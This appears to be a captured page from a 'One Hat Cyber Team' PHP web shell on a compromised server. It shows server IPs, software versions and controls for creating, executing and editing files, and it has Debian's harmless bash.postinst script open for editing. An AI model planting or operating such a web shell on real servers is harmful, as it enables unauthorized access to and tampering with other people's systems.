One Hat Cyber Team
Your IP :
18.191.201.27
Server IP :
104.21.32.1
Server :
Linux agrigation-prod 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64
Server Software :
nginx/1.24.0
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
thread-self
/
root
/
var
/
lib
/
dpkg
/
info
/
Edit File:
bash.postinst
#! /bin/bash set -e # This should never happen. if [ ! -e /bin/sh ]; then ln -s bash /bin/sh fi update-alternatives --install \ /usr/share/man/man7/builtins.7.gz \ builtins.7.gz \ /usr/share/man/man7/bash-builtins.7.gz \ 10 \ || true if [ "$1" = configure ] && dpkg --compare-versions "$2" le 3.2-3 \ && which add-shell >/dev/null then add-shell /bin/bash add-shell /bin/rbash fi # Automatically added by dh_installmenu/13.6ubuntu1 if [ "$1" = "configure" ] && [ -x "`command -v update-menus`" ]; then update-menus fi # End automatically added section exit 0
Simpan